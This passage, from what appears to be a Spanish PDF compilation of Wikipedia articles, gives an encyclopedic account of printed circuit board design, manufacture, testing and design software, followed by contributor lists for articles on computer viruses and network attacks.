clase de tarjetas, a veces llamadas circuitos flexibles, o circuitosrígido-flexibles, respectivamente, son difíciles de crear, pero tienen muchas aplicaciones. A veces son flexibles paraahorrar espacio (los circuitos impresos dentro de las cámaras y audífonos son casi siempre circuitos flexibles, de talforma que puedan doblarse en el espacio disponible limitado. En ocasiones, la parte flexible del circuito impreso seutiliza como cable o conexión móvil hacia otra tarjeta o dispositivo. Un ejemplo de esta última aplicación es el cableque conecta el cabezal en una impresora de inyección de tinta.

Page 136: Virus informático

Circuito impreso 134

Características básicas del sustrato

Mecánicas1.1. Suficientemente rígidos para mantener los componentes.2.2. Fácil de taladrar.3.3. Sin problemas de laminado.

Químicas1.1. Metalizado de los taladros.2.2. Retardante de las llamas.3.3. No absorbe demasiada humedad.

Térmicas1.1. Disipa bien el calor.2.2. Coeficiente de expansión térmica bajo para que no se rompa.3.3. Capaz de soportar el calor en la soldadura.4.4. Capaz de soportar diferentes ciclos de temperatura.

Eléctricas1.1. Constante dieléctrica baja para tener pocas pérdidas.2.2. Punto de ruptura dieléctrica alto.

DiseñoUsualmente un ingeniero eléctrico o electrónico diseña el circuito y un especialista diseña el circuito impreso. Eldiseñador debe obedecer numerosas normas para diseñar un circuito impreso que funcione correctamente y que almismo tiempo sea barato de fabricar.

Diseño electrónico automatizadoLos diseñadores de circuitos impresos a menudo utilizan programas de diseño electrónico automatizado (EDA porsus siglas en inglés), para distribuir e interconectar los componentes. Estos programas almacenan informaciónrelacionada con el diseño, facilita la edición, y puede también automatizar tareas repetitivas.La primera etapa es convertir el esquema en una lista de nodos (o net list en inglés). La lista de nodos es una lista delos pines (o patillas) y nodos del circuito, a los que se conectan los pines de los componentes. Usualmente elprograma de captura de esquemáticos, utilizado por el diseñador del circuito, es responsable de la generación de lalista de nodos, y esta lista es posteriormente importada en el programa de ruteo.El siguiente paso es determinar la posición de cada componente. La forma sencilla de hacer esto es especificar unarejilla de filas y columnas, donde los dispositivos deberían ir. Luego, el programa asigna el pin 1 de cada dispositivoen la lista de componentes, a una posición en la rejilla. Típicamente, el operador puede asistir a la rutina deposicionamiento automático al especificar ciertas zonas de la tarjeta, donde deben ir determinados grupos decomponentes. Por ejemplo, a las partes asociadas con el subcircuito de la fuente de alimentación se les podría asignaruna zona cercana a la entrada al conector de alimentación. En otros casos, los componentes pueden ser posicionadosmanualmente, ya sea para optimizar el desempeño del circuito, o para poner componentes tales como perillas,interruptores y conectores, según lo requiere el diseño mecánico del sistema.El computador luego expande la lista de componentes en una lista completa de todos los pines para la tarjeta, utilizando plantillas de una biblioteca de footprints asociados a cada tipo de componentes. Cada footprint es un mapa

Page 137: Virus informático

Circuito impreso 135

de los pines de un dispositivo, usualmente con la distribución de los pad y perforaciones recomendadas. Labiblioteca permite que los footprint sean dibujados sólo una vez, y luego compartidos por todos los dispositivos deese tipo.En algunos sistemas, los pads de alta corriente son identificados en la biblioteca de dispositivos, y los nodosasociados son etiquetados para llamar la atención del diseñador del circuito impreso. Las corrientes elevadasrequieren de pistas más anchas, y el diseñador usualmente determina este ancho.Luego el programa combina la lista de nodos (ordenada por el nombre de los pines) con la lista de pines (ordenadapor el nombre de cada uno de los pines), transfiriendo las coordenas físicas de la lista de pines a la lista de nodos. Lalista de nodos es luego reordenada, por el nombre del nodo.Algunos sistemas pueden optimizar el diseño al intercambiar la posición de las partes y compuertas lógicas parareducir el largo de las pistas de cobre. Algunos sistemas también detectan automáticamente los pines de alimentaciónde los dispositivos, y generan pistas o vías al plano de alimentación o conductor más cercano.Luego el programa trata de rutear cada nodo en la lista de señales-pines, encontrando secuencias de conexión en lascapas disponibles. A menudo algunas capas son asignadas a la alimentación y a la tierra, y se conocen como plano dealimentación y tierra respectivamente. Estos planos ayudan a blindar los circuitos del ruido.El problema de ruteo es equivalente al problema del vendedor viajero, y es por lo tanto NP-completo, y no se prestapara una solución perfecta. Un algoritmo práctico de ruteo es elegir el pin más lejano del centro de la tarjeta, y luegousar un algoritmo codicioso para seleccionar el siguiente pin más cercano con la señal del mismo nombre.Después del ruteo automático, usualmente hay una lista de nodos que deben ser ruteados manualmente.Una vez ruteado, el sistema puede tener un conjunto de estrategias para reducir el costo de producción del circuitoimpreso. Por ejemplo, una rutina podría suprimir las vías innecesarias (cada vía es una perforación, que cuestadinero). Otras podrían redondear los bordes de las pistas, y ensanchar o mover las pistas para mantener el espacioentre éstas dentro de un margen seguro. Otra estrategia podría ser ajustar grandes áreas de cobre de tal forma queellas formen nodos, o juntar áreas vacías en áreas de cobre. Esto permite reducir la contaminación de los productosquímicos utilizados durante el grabado y acelerar la velocidad de producción.Algunos sistemas tienen comprobación de reglas de diseño para validar la conectividad eléctrica y separación entrelas distintas partes, compatibilidad electromagnética, reglas para la manufactura, ensamblaje y prueba de las tarjetas,flujo de calor y otro tipo de errores.La serigrafía, máscara antisoldante y plantilla para la pasta de soldar, a menudo se diseñan como capas auxiliares.

Manufactura

Patrones

A la izquierda la imagen de la PCB diseñada por ordenador y a laderecha la PCB manufacturada y montada.

La gran mayoría de las tarjetas para circuitos impresosse hacen adhiriendo una capa de cobre sobre todo elsustrato, a veces en ambos lados (creando un circuitoimpreso virgen), y luego retirando el cobre no deseadodespués de aplicar una máscara temporal (por ejemplo,grabándola con percloruro férrico), dejando sólo laspistas de cobre deseado. Algunos pocos circuitosimpresos son fabricados al agregar las pistas alsustrato, a través de un proceso complejo deelectrorecubrimiento múltiple. Algunos circuitos

Page 138: Virus informático

Circuito impreso 136

impresos tienen capas con pistas en el interior de éste, y son llamados cicuitos impresos multicapas. Éstos sonformados al aglomerar tarjetas delgadas que son procesadas en forma separada. Después de que la tarjeta ha sidofabricada, los componentes electrónicos se sueldan a la tarjeta.

Métodos típicos para la producción de circuitos impresos1.1. La impresión serigráfica utiliza tintas resistentes al grabado para proteger la capa de cobre. Los grabados

posteriores retiran el cobre no deseado. Alternativamente, la tinta puede ser conductiva, y se imprime en unatarjeta virgen no conductiva. Esta última técnica también se utiliza en la fabricación de circuitos híbridos.

2. El fotograbado utiliza una fotomecánica y grabado químico para eliminar la capa de cobre del sustrato. Lafotomecánica usualmete se prepara con un fotoplotter, a partir de los datos producidos por un programa para eldiseño de circuitos impresos. Algunas veces se utilizan transparencias impresas en una impresora Láser comofotoherramientas de baja resolución.

3. El fresado de circuitos impresos utiliza una fresa mecánica de 2 o 3 ejes para quitar el cobre del sustrato. Unafresa para circuitos impresos funciona en forma similar a un plotter, recibiendo comandos desde un programa quecontrola el cabezal de la fresa los ejes x, y y z. Los datos para controlar la máquina son generados por el programade diseño, y son almacenados en un archivo en formato HPGL o Gerber.

4.4. La impresión en material termosensible para transferir a través de calor a la placa de cobre. En algunos sitioscomentan de uso de papel glossy (fotográfico), y en otros de uso de papel con cera como los papeles en los quevienen los autoadesivos.

Tanto el recubrimiento con tinta, como el fotograbado requieren de un proceso de atacado químico, en el cual elcobre excedente es eliminado, quedando únicamente el patrón deseado.

AtacadoEl atacado de la placa virgen se puede realizar de diferentes maneras. La mayoría de los procesos utilizan ácidos ocorrosivos para eliminar el cobre excedente. Existen métodos de galvanoplastia que funcionan de manera rápida,pero con el inconveniente de que es necesario atacar al ácido la placa después del galvanizado, ya que no se eliminatodo el cobre.Los químicos más utilizados son el cloruro férrico, el sulfuro de amonio, el ácido clorhídrico mezclado con agua yperóxido de hidrógeno. Existen formulaciones de ataque de tipo alcalino y de tipo ácido. Según el tipo de circuito afabricar, se considera más conveniente un tipo de formulación u otro.Para la fabricación industrial de circuitos impresos es conveniente utilizar máquinas con transporte de rodillos ycámaras de aspersión de los líquidos de ataque, que cuentan con control de temperatura, de control de presión y develocidad de transporte. También es necesario que cuenten con extracción y lavado de gases.

PerforadoLas perforaciones, o vías, del circuito impreso se taladran con pequeñas brocas hechas de carburo tungsteno. Elperforado es realizado por maquinaria automatizada, controlada por una cinta de perforaciones o archivo deperforaciones. Estos archivos generados por computador son también llamados taladros controlados porcomputador (NCD por sus siglas en inglés) o archivos Excellon. El archivo de perforaciones describe la posición ytamaño de cada perforación taladrada.Cuando se requieren vías muy pequeñas, taladrar con brocas es costoso, debido a la alta tasa de uso y fragilidad deéstas. En estos casos, las vías pueden ser evaporadas por un láser. Las vías perforadas de esta forma usualmentetienen una terminación de menor calidad al interior del orificio. Estas perforaciones se llaman micro vías.También es posible, a través de taladrado con control de profundidad, perforado láser, o pre-taladrando las láminas individuales antes de la laminación, producir perforaciones que conectan sólo algunas de las capas de cobre, en vez

Page 139: Virus informático

Circuito impreso 137

de atravesar la tarjeta completa. Estas perforaciones se llaman vías ciegas cuando conectan una capa interna con unade las capas exteriores, o vías enterradas cuando conectan dos capas internas.Las paredes de los orificios, para tarjetas con dos o más capas, son metalizadas con cobre para formar, orificiosmetalizados, que conectan eléctricamente las capas conductoras del circuito impreso.

Estañado y máscara antisoldanteLos pads y superficies en las cuales se montarán los componentes, usualmente se metalizan, ya que el cobre aldesnudo no es soldable fácilmente. Tradicionalmente, todo el cobre expuesto era metalizado con soldadura. Estasoldadura solía ser una aleación de plomo-estaño, sin embargo, se están utilizando nuevos compuestos para cumplircon la directiva RoHS de la UE, la cual restringe el uso de plomo. Los conectores de borde, que se hacen en los ladosde las tarjetas, a menudo se metalizan con oro. El metalizado con oro a veces se hace en la tarjeta completa.Las áreas que no deben ser soldadas pueden ser recubiertas con un polímero resistente a la soldadura, el cual evitacortocircuitos entre los pines adyacentes de un componente.

SerigrafíaLos dibujos y texto se pueden imprimir en las superficies exteriores de un circuito impreso a través de la serigrafía.Cuando el espacio lo permite, el texto de la serigrafía puede indicar los nombres de los componentes, laconfiguración de los interruptores, puntos de prueba, y otras características útiles en el ensamblaje, prueba y serviciode la tarjeta. También puede imprimirse a través de tecnología de impresión digital por chorro de tinta(inkjet/Printar) y volcar información variable sobre el circuito (serialización, códigos de barra, información detrazabilidad).

MontajeEn las tarjetas through hole (a través del orificio), los pines de los componentes se insertan en los orificios, y sonfijadas eléctrica y mecánicamente a la tarjeta con soldadura.Con la tecnología de montaje superficial, los componentes se sueldan a los pads en las capas exteriores de la tarjetas.A menudo esta tecnología se combina con componentes through hole, debido a que algunos componentes estándisponibles sólo en un formato.

Pruebas y verificaciónLas tarjetas sin componentes pueden ser sometidas a pruebas al desnudo, donde se verifica cada conexión definidaen el netlist en la tarjeta finalizada. Para facilitar las pruebas en producciones de volúmenes grandes, se usa unaCama de pinchos para hacer contacto con las áreas de cobre u orificios en uno o ambos lados de la tarjeta. Uncomputador le indica a la unidad de pruebas eléctricas, que envíe una pequeña corriente eléctrica a través de cadacontacto de la cama de pinchos, y que verifique que esta corriente se reciba en el otro extremo del contacto. Paravolúmenes medianos o pequeños, se utilizan unidades de prueba con un cabezal volante que hace contacto con laspistas de cobre y los orificios para verificar la conectividad de la placa verificada.

Protección y paqueteLos circuitos impresos que se utilizan en ambientes extremos, usualmente tienen un recubrimiento, el cual se aplicasumergiendo la tarjeta o a través de un aerosol, después de que los componentes han sido soldados. El recubrimientopreviene la corrosión y las corrientes de fuga o cortocircuitos producto de la condensación. Los primerosrecubrimientos utilizados eran ceras. Los recubrimientos modernos están constituidos por soluciones de gomasilicosa, poliuretano, acrílico o resina epóxica. Algunos son plásticos aplicados en una cámara al vacío.

Page 140: Virus informático

Circuito impreso 138

Tecnología de montaje superficialLa tecnología de montaje superficial fue desarrollada en la década de 1960, ganó impulso en Japón en la década de1980, y se hizo popular en todo el mundo a mediados de la década de 1990.Los componentes fueron mecánicamente rediseñados para tener pequeñas pestañas metálicas que podían ser soldadasdirectamente a la superficie de los circuitos impresos. Los componentes se hicieron mucho más pequeños, y el usode componentes en ambos lados de las tarjetas se hizo mucho más común, permitiendo una densidad decomponentes mucho mayor.El montaje superficial o de superficie se presta para un alto grado de automatización, reduciendo el costo en mano deobra y aumentando las tasas de producción. Estos dispositivos pueden reducir su tamaño entre una cuarta a unadécima parte, y su costo entre la mitad y la cuarta parte, comparado con componentes through hole

Listado de maquinas industriales que intervienen en la fabricación de PCB1. Perforadoras de control numérico con cambio automático de mechas2.2. Perforadora de control numérico 6 de 4 cabezales3.3. Laminadora4.4. Iluminadora de 2 x 1000W de una bandeja doble faz5.5. Iluminadora 60/75 de 2 x 5000W de doble bandeja doble faz6. Reveladora de fotopolímeros de 4 cámaras7.7. Desplacadora de fotopolímeros de 4 cámaras8.8. Grabadora amoniacal de 2 cámaras + doble enjuague9. Grabadora amoniacal10.10. Impresoras serigráficas semiautomáticas11.11. Impresora12.12. Pulidoras simple13.13. Pulidora14.14. Fotoploter de película continua de triple rayo láser15.15. Reveladora continua de películas fotográficas16.16. Router de control numérico de 1 cabezal de capacidad de 600 x 600 mm17.17. Perforadora / apinadora de doble cabezal18.18. Compresores de pistón seco de 10 HP19. Compresor de tornillo de 30 HP20.20. Guillotina21. Hornos de secado22. Afiladora de mechas de vidia de 6 piedras23.23. Máquina de V-scoring24.24. Reveladora con 2 cámaras de enjuague25.25. Máquina Bonding de cuatro cabezales

Page 141: Virus informático

Circuito impreso 139

Programas para el diseño de circuitos impresos•• OrCAD•• Proteus•• kicad•• Altium•• Livewire•• PCBWiz•• DesignSpark PCB

Notas y referencias

Enlaces externos• Construcción de una plaqueta de circuito Impreso (http:/ / concifederico. blogspot. com/ 2012/ 10/

construccion-de-una-plaqueta-pcb. html) - Guía con detalles para mejorar la calidad constructiva de los circuitosimpresos.

• Cómo fabricar circuitos impresos (http:/ / www. circuitoselectronicos. org/ 2010/ 08/como-fabricar-circuitos-impresos-metodo. html) - Cómo hacer fácilmente circuitos impresos.

• Tutoriales en Robotic-Lab (http:/ / www. robotic-lab. com/ blog/ tutoriales/ como-fabricar-circuitos-impresos/ ) -Como hacer de forma casera y económica circuitos impresos

• Como fabricar tus propios PCB (http:/ / www. ucontrol. com. ar/ wiki/ index.php?title=Como_construir_tus_propios_PCB) - Un tutorial paso a paso con fotografías sobre como construircircuitos impresos en casa

• Calculadoras de la impedancia del PCB (http:/ / www. sunmantechnology. com/ resources_ec. html) -Calculadoras de la impedancia (en inglés)

Page 142: Virus informático

Fuentes y contribuyentes del artículo 140

Fuentes y contribuyentes del artículoVirus informático  Fuente: http://es.wikipedia.org/w/index.php?oldid=65551505  Contribuyentes: .Sergio, Abgenis, Airunp, Airwolf, Alejandra 55, Alejandroml, Alex music24, Alexav8,Alexistorrez, Alfa989, Alhen, Aloriel, Alvarittox, Amadís, Ana isabel montufar, AngelsCry, Antur, Arhendt, Arrt-932, Ascánder, AstroF7, BL, BRiemann, Baiji, Balboa13, Beto29, BetoCG,BlackBeast, Blacki4, Bostok I, Brion VIBBER, Cacatua777, Camilo, Camima, Carolchin, CesarWoopi, Chapapapa, Cheu, Chuck es dios, Cinabrium, Comae, CommonsDelinker, Cratón, Cronosx, Ctrl Z, Dangarcia, David0811, Death Master, Dermot, Diamondland, Diegusjaimes, Dreitmen, EGFerreiro, Edmenb, Eduardosalg, Edub, Edupedro, Egaida, Ejmeza, ElPiedra, Elabra sanchez,Elhorrego, Elisardojm, Elliniká, Emijrp, Ente X, Er Komandante, Erick dm, FACCE, FAR, Fanattiq, Fdelrio89, FedericoF, Felipewiki, Fernando Estel, Ferrari 707, Filipo, Fmariluis, FrancoGG,Frango com Nata, Fravia, Furrykef, Gabriel-rocksarino, Gafotas, General Pico, GermanX, Germo, Greek, Gurgut, Gusgus, Gustronico, HECTOR ARTURO AZUZ SANCHEZ, HUB,Hack-Master, House, Humberto, Icvav, Internetsinacoso, Interwiki, Isha, JMPerez, JOKblogger, Jacorream, Jakeukalane, Jareyes, Jarisleif, Javierdekai, Jondel, JorgeGG, Joseaperez, Josemanib,Juanfran GG, Juli 2007, Jusaheco, K312W1N, Kaninchen, Kekkyojin, Kender00, Kirtash, Kizar, KnightRider, Kved, La Corona, Libero, Linfocito B, Lucien leGrey, LuisArmandoRasteletti,Luiswtc73, LyingB, M303, MATADOR-Z, Macar, Mafores, Magister Mathematicae, Mahadeva, Maldoror, Maleiva, Mamosi, Mansoncc, ManuP, Manuelt15, Manwë, Marcmasmiquel, Marco94,MarcoAurelio, Markoszarrate, Markps96, Matdrodes, Matiash93, Mel 23, Millars, Monicagorzy, Montehermoso-spain, Montgomery, Moriel, Mstreet linux, Muro de Aguas, Murphy era unoptimista, Máximo de Montemar, N4D13, Nara Shikamaru, Nemo, Netito777, Numenor 90, Ornitododo, Ortisa, Oscar ., Pabloallo, Pan con queso, Petronas, Phyrokarma, Pilaf, Pinar, Pincho76,Pitototote, Platonides, Pólux, Queninosta, Quesada, Qwertyytrewqqwerty, RETEGA, Rafa3040, Rastrojo, Raystorm, Rebanvi, Reidrac, Richy, Rmarmolejor, Roberto Fiadone, RoyFocker,Rrmsjp, STARPLAYER, Sabbut, Sanbec, Santiperez, Satin, Sebastiano, Serail, Sergio Andres Segovia, Sigmanexus6, Sking, Smrolando, Snakeyes, Spirit-Black-Wikipedista, SuperBraulio13,Superzerocool, Taichi, Tano4595, Timmy turner123, Tinom 94, Tirithel, Tomatejc, Tophia, TorQue Astur, Tortillovsky, Triku, Tuxisuau, Txuspe, Ty25, Ucevista, VR0, VanKleinen, Varano,Veon, Vic Fede, Victormoz, Vitamine, Voiceterms, Will vm, Winjaime, XalD, Yaneli'm, Yeza, Zanaqo, ZrzlKing, conversion script, 929 ediciones anónimas

ILoveYou  Fuente: http://es.wikipedia.org/w/index.php?oldid=66525222  Contribuyentes: Alexav8, BludgerPan, Carmin, Cordwainer, Dreitmen, Ezarate, Humberto, Jkbw, Kizar, Mel 23, MissManzana, NoditaPony, PMéndezor, Rastrojo, SuperBraulio13, Urbanuntillll, XalD, 37 ediciones anónimas

Distribución Linux  Fuente: http://es.wikipedia.org/w/index.php?oldid=67359534  Contribuyentes: -jem-, .Sergio, 1c6180, 4lex, Abor, Acratta, Afrox, Alberto Maria, AlbertoDV, AlexAlonso,Alexis PM, Allentiak, Aloriel, Antoine, Antoniogartime ule, Antur, Arístides Herrera Cuntti, Ascánder, Bartoloco, Canariocio, Carazo, Carolingio93, Cidtux, Cinabrium, Clbt, ColdWind,Colossus3000, DZPM, Dangarcia, Darolu, Davis150, Daycart, Definixertivm, Deivis, Dhidalgo, Digigalos, Dodo, Donmatas, Doreano, Dummydanger, Ebrainte, Eduardobora, Eduardosalg, Edub,Edupedro, Efremigio, El Pantera, Emijrp, Enriquemc, Er Komandante, Escarlati, Escornaboi, FADG, Federicotg, Felipealvarez, Fitoschido, Francisco Sosa Romero, FrancoGG, Fzf, GabrielAcquistapace, Gacq, GermanX, Gotencool, Gronky, Götz, Hack-Master, Hanjin, Helmy oved, Hispa, Hprmedina, Humbefa, Iacaca, Interwiki, JOPARA, Jakeukalane, Jap99, Jcentel, Jfranco,Jjvaca, JoRgE-1987, Josemiguel93, Jotapesan, Jsanchezes, JuanPaBJ16, Juanpellicer, K-F.U.N 2, Kerberosdelhades, Kirdux, Klaus 15, KnightRider, Lasarux, Lermit, Leugim1972, Linfocito B,Lucien leGrey, LyingB, M4TYA5, Mablanco, Madek, Maesitos, ManoloKosh, Mansoncc, ManuelGR, Mapalma, MarcosManoni, Mark83, Martínhache, Matdrodes, Mauricio.Andres.Gles,Maximilinux, Mescalier, Mortadelo2005, Mstreet linux, Neodraco, Nicolasfrutos, Nihilo, Nikai, Omerta-Ve, Orgullomoore, Periku, Petronas, Pumuki, Pólux, Quiron, Raidentk, Ralgis, Ramjar,Ratatouille18, Rbidegain, Reidatov, Rholguinc, Ricardogpn, Ricochetmex, RoyFocker, Rpm, Rsg, Rubpe19, Rudial, SF007, Sabbut, Salvatore.trimarchi, Shooke, Since, Snakefang,Speedguitardemon, SuperBraulio13, Surfaz, Tafol, Technopat, Thussar, Tonny logicc, Truor, Tuxedoar, VARGUX, Valenluis, Vdifiore, Venturi, Vitamine, Wedrey, X.Cyclop, Xihh, Xosema,Xuankar, Yakoo, Yoansierra, Yrithinnd, ZeRobLaCk, Zelkova, 448 ediciones anónimas

Servidor  Fuente: http://es.wikipedia.org/w/index.php?oldid=67079873  Contribuyentes: -jem-, .roman.., 4lex, 80.35.47.xxx, Abece, Aeveraal, AlexGPL, Alhen, Altoloco, Andre Engels,Ascánder, Barcex, Biasoli, Billinghurst, BuenaGente, Cancervero1024, Caos, Carmin, ColdWind, Comae, CommonsDelinker, Cronos x, Developer, Diegusjaimes, Dodo, Edelete, Edslov,Ejbogantes, Ejrrjs, Emijrp, Equi, FAR, Farcu9119, Farisori, FedericoMP, FrancoGG, Frigotoni, Furti, Gabyjac, Gacq, GermanX, HECTOR ARTURO AZUZ SANCHEZ, Halfdrag, Helmy oved,Humanware, Humberto, Igna, Interwiki, J. A. Gélvez, Jacksonh, Jcfidy, Jesuja, Jkbw, Jsanchezes, Jugones55, Kamo64, Kjgomez, Lasneyx, Laura Fiorucci, Lordlirych, Ludeir, Mac, MagisterMathematicae, Mansoncc, ManuelGR, Maquedasahag, Markoszarrate, Matdrodes, Moiwiki, Moriel, Mortadelo2005, Moscar, Netito777, New traffic pattern, Ninovolador, Nuncaeterno, OMenda,Osado, PetrohsW, Pit, Poco a poco, Pólux, Ralgis, Raul Medina, Ricardo Moctezuma, Rondador, Rosarino, Rsg, Rαge, SPZ, Santiago Martín, Savh, Sergio Andres Segovia, Shooke, SirSlither,Sonoriuxo, SuperBraulio13, Superzerocool, Syrus, Tano4595, Technopat, Tei, TeleMania, Thedown, Tirithel, UA31, Veltys, Vesm, Victor0808, Walterzum, Wikiléptico, Zeist Antilles, Zokeber,conversion script, proxy1.unizar.es, Ángel Luis Alfaro, 298 ediciones anónimas

Ingeniería social (seguridad informática)  Fuente: http://es.wikipedia.org/w/index.php?oldid=67196864  Contribuyentes: 2rombos, AchedDamiman, Aeris, Alakasam, Alexav8,AndreaAlvarez2012, CF, Damianiencowiki, Diogeneselcinico42, Ekz4, Endo, Fernd, FingolRicks, Furado, Gabriel Acquistapace, GermanX, Jorge c2010, Jorgechp, LauraFarina, Lbmartinez,Leandro Palacios, Lnegro, Luiscastellanos, LyingB, Matdrodes, Pedro Nonualco, Platonides, Pólux, Shalbat, Spa karmona, TXiKi, Technopat, Tony Rotondas, UAwiki, Woyzeck, 69 edicionesanónimas

Blaster  Fuente: http://es.wikipedia.org/w/index.php?oldid=64735306  Contribuyentes: Aelo, Alexav8, Alvaro qc, Beto29, Boja, Camilo, Corbachini33, DamianFinol, Er Komandante, Espilas,Humberto, Inteco, Jarke, Julio Augusto, Kizar, Papix, Ricardogpn, Sergio Andres Segovia, Timmy turner123, Vitamine, 57 ediciones anónimas

Ataque de denegación de servicio  Fuente: http://es.wikipedia.org/w/index.php?oldid=66990666  Contribuyentes: Albertojuanse, Alemazurk Mayo, AlexGPL, Alexisabarca, Aloriel, Antojio,Antur, Açipni-Lovrij, Barri, Chiquix, Cinabrium, DMG, Daniel G., Dav7mx, Diegusjaimes, Dodo, Dorieo, Ejmeza, Emijrp, Enrichh, Er Komandante, Feministo, Gallowolf, GermanX, Ghostbar,Hernando Gamezvar, Huds, ILoveSugar, Jakeukalane, Jjvaca, Jkbw, Jugones55, Kekkyojin, Kizar, Laura Fiorucci, Leandrosw, Linux65, Manuelt15, Montgomery, Mortadelo, Nelsito777,NonimoHack, Orgullomoore, Paintman, RICARDOSA, Ralgis, Rastrojo, Rizome, Rllaque, Sans-Serif, Smoken Flames, Snak1116, Superzerocool, Surfaz, Technopat, Vicper, X.Cyclop, Yilku1,153 ediciones anónimas

Ping de la muerte  Fuente: http://es.wikipedia.org/w/index.php?oldid=64945754  Contribuyentes: BlackBeast, Dalacost, Diegusjaimes, Digigalos, GermanX, Herresuelo, Individuo7, JMorchio,Jjvaca, Josemajosema, Kizar, Paintman, Poc-oban, Savh, Sellkyrck, Sergio Andres Segovia, Vivaelcelta, William1509, Xoneca, 31 ediciones anónimas

Anonymous  Fuente: http://es.wikipedia.org/w/index.php?oldid=67287551  Contribuyentes: 99gogeta, Abece, Adri--93, Albert1805, Alejandrocaro35, Aleuze, Amadís, Aner77, Anonymo12,AnselmiJuan, Anviatella, ArgosPerroDeOdiseo, Aswarp, Atila rey, Augusto664, Belb, BetoCG, BlouBlou, Boina01, Boogie, Bryanpvz, Buscador123, CHUCAO, Caso1, Cheveri, Ciberprofe,Cirt, Contulmo, Correogsk, Dagane, Daniyyel, Dark-Jav, Depekes, Dhidalgo, Dorieo, Dossier2, Duvan Andres 25, EMCpictures, Editor123, Eliavp, Elimedina, Elkingkapo, Emiduronte,Entalpia2, Escarlati, Fadesga, Fercufer, Ferrari-99, Festor, GM83, Gallowolf, Gelpgim22, Gilc, Glyniss®, Grillitus, ILoveSugar, Igna, Ileana n, Imperator-Kaiser, Inuyasha1111, JESSIP, JMCC1,JOSEVI3232, Jcaraballo, Jkbw, Jorge 2701, Julianortega, Killmasterfromspain, Kizar, Kof1500, Laura Fiorucci, Leiro & Law, LocoWiki, LordT, M.heda, MadriCR, Magister Mathematicae,Makeiro, Manolin160, Mapep, Mar del Sur, Martely, Mathonius, MaurOS X, Metrónomo, MiguelSinAlma, Molibdeno42, Montgomery, Na vanya, Nash0h, Neropock, Netito777, Ninrouter,OboeCrack, Petronas, Piuka, Pla y Grande Covián, Pólux, Ralgis, Rastrojo, Reynaldo Villegas Peña, Rock xyz 666, Rosarino, Ruberyuka, Sabbut, Sageo, Saloca, Savh, Sebrev, Sergio AndresSegovia, Srbanana, Steiber, Torrenteforever, VashTheStampede, Waka Waka, Warko, ZEN ic, Zoram.hakaan, Zulucho, Ángel Luis Alfaro, 288 ediciones anónimas

Nuke  Fuente: http://es.wikipedia.org/w/index.php?oldid=66992158  Contribuyentes: BetoCG, Iacobushumilis, Kostellus, Rizome, Tomatejc, 2 ediciones anónimas

Flags  Fuente: http://es.wikipedia.org/w/index.php?oldid=62887771  Contribuyentes: Bahamunt, Barri, Marcelo8776, Pipandro, Waeswaes

Ataque smurf  Fuente: http://es.wikipedia.org/w/index.php?oldid=64612675  Contribuyentes: DJ Nietzsche, GermanX, Jfwiki, Kizar, Lalbertme, Leandrosw, Paintman, Rufflos, Tano4595,Ysidoro, 11 ediciones anónimas

Antivirus  Fuente: http://es.wikipedia.org/w/index.php?oldid=67450783  Contribuyentes: -ecarv-, -jem-, 2rombos, 3coma14, 9javivi, AITDIV, Abgenis, AchedDamiman, Airunp, Al59, Alavisan,Aleposta, Alexan, Alexlp182, Alvaro qc, Andreasmperu, Angel GN, Anma12345678910, Anrfernandez, Antur, Ap0st0L, ArSk8, Argenis86, Aristarco de Samotracia, Asael31, Asqueladd,Açipni-Lovrij, Baiji, Banfield, Barcex, Baute2010, Beesocialmx, Beta15, BetoCG, BlackBeast, BuenaGente, Bulimaster, Camilo, Canopus49, Canopus49Puppet, Carlos e64, Carmin, Carutsu,Cesarth15, Charlie Wiki, Chico512, Ciencia Al Poder, Cipión, Claudiameme, Corydora, Cratón, Creosota, Cris7593, Daimond, Dangelin5, Dartozitho, Diego1105, Diegusjaimes, Dmlambea,Dragonager, Dx4, EL NEGRO FERIA, Ec uv, Edmenb, Eduardosalg, Edub, El loko, Elabra sanchez, Elgrandezon, Elisardojm, Elliniká, Elmejoramigodelhombre, Elsenyor, Emiduronte, Emijrp,Ensada, Estefania avila, Ezarate, FAR, FFD, FedericoMP, Ferbr1, Filipo, Firewalldefender, Folkvanger, Foundling, Foxinlee, FrancoGG, Gabi turretoh, Gacelo, Gacq, Gaijin, Gaius iulius caesar,Ganímedes, GermanX, Gothmog, Grizzly Sigma, Gsrdzl, Guadalupe Emmanuel, HECTOR ARTURO AZUZ SANCHEZ, HUB, Hack-Master, Hectordanielopez, Helmy oved, Hprmedina,Humberto, Ialad, Ignacios, Isha, J. A. Gélvez, JMPerez, Jabov5, Javiergtareveron, Javierito92, Jcaraballo, Jjmama, Jkbw, Jmvgpartner, Jonadad, JorgeGG, Jorgechp, Joseaperez, Jprm, Jsanchezes,Judioxx, Julian leonardo paez, Jxvierrm, Khattab01, KnightRider, Kved, Latinoyargentino, Laura Fiorucci, Leonpolanco, Libero, Lifnob, Linfocito B, Lissitax, LordNes, Lourdes Cardenal,LyingB, Lázaro, Mafores, Magister Mathematicae, Mahadeva, Manwë, Marcelo, MarcoAurelio, Margueniz, Matdrodes, Mel 23, MercurioMT, Misi91, MotherForker, Mpeinadopa, Mr.Ajedrez,Mrexcel, Mrtn z, Muro de Aguas, Mushii, Mutari, NaSz, Natrix, Netito777, Nixón, Nubecosmica, OboeCrack, Orcaj001, Orlandodj, Ortisa, Oscar ., PAULOGARCIA2005, Pacostein,Painandloveaxl, Palica, Pan con queso, Panda Madrid, Perman, Peter Griffin, Petruss, Platonides, Porao, Pólux, Queninosta, Qwertyytrewqqwerty, RAMDOM X, Racso, Ralgis, Raulshc,Recuperamosdatos, Retama, Ricardogpn, Ricardovo, Roberpl, Rockerorocky, Rodrigofeu, RoyFocker, Rubpe19, Rαge, STARPLAYER, Santiperez, Satin, Savh, Sebasgnokrbipahbdfg, SergioMendez Galindo, Sermed, SeñorDarcy, Si brigith jaja, Siabef, Simeón el Loco, Skywalker309, Soruz, SuperBraulio13, Superzerocool, Taichi, Tano4595, Technopat, The worst user, Tirithel,Tonchizerodos, Tostadora, Troels Nybo, UA31, Vacarreno, Vatelys, Veon, Vitamine, Vubo, Wedrey, Will vm, Xexito, Yeza, Zanaqo, Zeytin, 1183 ediciones anónimas

Page 143: Virus informático

Fuentes y contribuyentes del artículo 141

